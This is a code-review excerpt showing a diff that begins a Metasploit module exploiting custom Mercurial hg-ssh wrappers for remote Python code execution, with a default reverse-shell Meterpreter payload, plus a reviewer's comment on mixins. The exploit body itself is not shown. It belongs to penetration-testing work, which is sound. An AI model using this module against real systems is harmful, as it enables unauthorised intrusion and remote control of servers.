modules/exploits/linux/ssh/mercurial_ssh_exec.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Mercurial custom hg-ssh wrapper Remote Code Exec",
+      'Description'    => %q{
+        This module takes advantage of custom hg-ssh wrapper implementations that don't 
+        adequately validate parameters passed to the hg binary, allowing users to trigger a
+        Python Debugger session, which allows arbitrary Python code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'claudijd',
+        ],
+      'References'     =>
+        [
+          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload' => 'python/meterpreter/reverse_tcp',
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'Privileged'     => false,
+      'DisclosureDate' => "April 18 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(""),
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
+        OptString.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rhost
```

Comment:
No, you're right. I'm used to it being available, but you didn't include any mixins that have it. Don't bother including `Msf::Exploit::Remote::Tcp` just to get `rhost` and `rport`. It's not worth pulling in more methods than you need.